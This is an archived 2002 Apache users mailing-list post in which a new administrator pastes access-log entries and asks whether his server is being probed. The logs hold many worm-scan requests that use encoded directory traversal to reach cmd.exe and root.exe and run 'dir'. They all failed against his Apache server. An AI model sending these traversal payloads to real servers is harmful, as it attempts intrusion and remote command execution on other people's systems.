httpd-users mailing list archives

Site index · List index
Message view « Date » · « Thread »
Top « Date » · « Thread »
From eric.li...@t-online.de (eric)
Subject Am I being probed?
Date Sun, 28 Jul 2002 16:03:37 GMT
Greetings!

I'm a newbie when it comes to many *nix things and Apache is one of them.  

I have two machines, one running Suse 8.0 and the other running WinME.  Both 
of them are hooked up to a LinkSys EtherFast DSL router.  My Suse box is 
running Apache 2.0.39.

I use WinMe to connect to the web server.  It's address is 192.168.1.100 and 
the Suse box is 192.168.1.101.

I was going through my Apache access log and found these entries:

217.228.40.62 - - [27/Jul/2002:19:16:05 +0200] "GET /scripts/root.exe?/c+dir 
HTTP/1.0" 404 787
217.228.40.62 - - [27/Jul/2002:19:16:10 +0200] "GET /MSADC/root.exe?/c+dir 
HTTP/1.0" 404 787
217.228.40.62 - - [27/Jul/2002:19:16:15 +0200] "GET 
/c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 787
217.228.40.62 - - [27/Jul/2002:19:16:21 +0200] "GET 
/d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 787
217.228.40.62 - - [27/Jul/2002:19:16:27 +0200] "GET 
/scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 787
217.228.40.62 - - [27/Jul/2002:19:16:32 +0200] "GET 
/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir 
HTTP/1.0" 404 787
217.228.40.62 - - [27/Jul/2002:19:16:38 +0200] "GET 
/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir 
HTTP/1.0" 404 787
217.228.40.62 - - [27/Jul/2002:19:16:44 +0200] "GET 
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir

HTTP/1.0" 404 787
217.228.40.62 - - [27/Jul/2002:19:16:50 +0200] "GET 
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 787
217.228.40.62 - - [27/Jul/2002:19:16:56 +0200] "GET 
/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 787
217.228.40.62 - - [27/Jul/2002:19:17:02 +0200] "GET 
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 787
217.228.40.62 - - [27/Jul/2002:19:17:08 +0200] "GET 
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 787
217.228.40.62 - - [27/Jul/2002:19:17:14 +0200] "GET 
/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 720
217.228.40.62 - - [27/Jul/2002:19:17:19 +0200] "GET 
/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 720
217.228.40.62 - - [27/Jul/2002:19:17:25 +0200] "GET 
/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 787
217.228.40.62 - - [27/Jul/2002:19:17:31 +0200] "GET 
/scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 787


217.235.140.189 - - [27/Jul/2002:19:45:51 +0200] "GET /scripts/root.exe?/c+dir 
HTTP/1.0" 404 787
217.235.140.189 - - [27/Jul/2002:19:45:52 +0200] "GET /MSADC/root.exe?/c+dir 
HTTP/1.0" 404 787
217.235.140.189 - - [27/Jul/2002:19:45:52 +0200] "GET 
/c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 787
217.235.140.189 - - [27/Jul/2002:19:45:52 +0200] "GET 
/d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 787
217.235.140.189 - - [27/Jul/2002:19:45:53 +0200] "GET 
/scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 787
217.235.140.189 - - [27/Jul/2002:19:45:53 +0200] "GET 
/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir 
HTTP/1.0" 404 787
217.235.140.189 - - [27/Jul/2002:19:45:53 +0200] "GET 
/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir 
HTTP/1.0" 404 787
217.235.140.189 - - [27/Jul/2002:19:45:54 +0200] "GET 
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir

HTTP/1.0" 404 787
217.235.140.189 - - [27/Jul/2002:19:45:54 +0200] "GET 
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 787
217.235.140.189 - - [27/Jul/2002:19:45:54 +0200] "GET 
/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 787
217.235.140.189 - - [27/Jul/2002:19:45:55 +0200] "GET 
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 787
217.235.140.189 - - [27/Jul/2002:19:45:55 +0200] "GET 
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 787
217.235.140.189 - - [27/Jul/2002:19:45:56 +0200] "GET 
/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 720
217.235.140.189 - - [27/Jul/2002:19:45:56 +0200] "GET 
/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 720
217.235.140.189 - - [27/Jul/2002:19:45:56 +0200] "GET 
/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 787
217.235.140.189 - - [27/Jul/2002:19:45:57 +0200] "GET 
/scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 787


217.228.92.217 - - [27/Jul/2002:20:30:53 +0200] "GET 
/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 720
217.228.92.217 - - [27/Jul/2002:20:30:54 +0200] "GET 
/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 720
217.228.92.217 - - [27/Jul/2002:20:30:56 +0200] "GET 
/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 787
217.228.92.217 - - [27/Jul/2002:20:30:57 +0200] "GET 
/scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 787


80.60.131.235 - - [28/Jul/2002:13:37:50 +0200] "GET /scripts/root.exe?/c+dir 
HTTP/1.0" 404 787
80.60.131.235 - - [28/Jul/2002:13:37:50 +0200] "GET /MSADC/root.exe?/c+dir 
HTTP/1.0" 404 787
80.60.131.235 - - [28/Jul/2002:13:37:50 +0200] "GET 
/c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 787
80.60.131.235 - - [28/Jul/2002:13:37:51 +0200] "GET 
/d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 787
80.60.131.235 - - [28/Jul/2002:13:37:51 +0200] "GET 
/scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 787
80.60.131.235 - - [28/Jul/2002:13:37:51 +0200] "GET 
/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir 
HTTP/1.0" 404 787
80.60.131.235 - - [28/Jul/2002:13:37:52 +0200] "GET 
/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir 
HTTP/1.0" 404 787
80.60.131.235 - - [28/Jul/2002:13:37:52 +0200] "GET 
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir

HTTP/1.0" 404 787
80.60.131.235 - - [28/Jul/2002:13:37:52 +0200] "GET 
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 787
80.60.131.235 - - [28/Jul/2002:13:37:53 +0200] "GET 
/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 787
80.60.131.235 - - [28/Jul/2002:13:37:53 +0200] "GET 
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 787
80.60.131.235 - - [28/Jul/2002:13:37:53 +0200] "GET 
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 787
80.60.131.235 - - [28/Jul/2002:13:37:54 +0200] "GET 
/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 720
80.60.131.235 - - [28/Jul/2002:13:37:54 +0200] "GET 
/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 720
80.60.131.235 - - [28/Jul/2002:13:37:54 +0200] "GET 
/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 787
80.60.131.235 - - [28/Jul/2002:13:37:55 +0200] "GET 
/scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 787


and there's a few more.

What's going on here?  Is there anyway I can find out?  Should I bother?  
Should I care?

Thanks, Eric

---------------------------------------------------------------------
To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
For additional commands, e-mail: users-help@httpd.apache.org


Mime
View raw message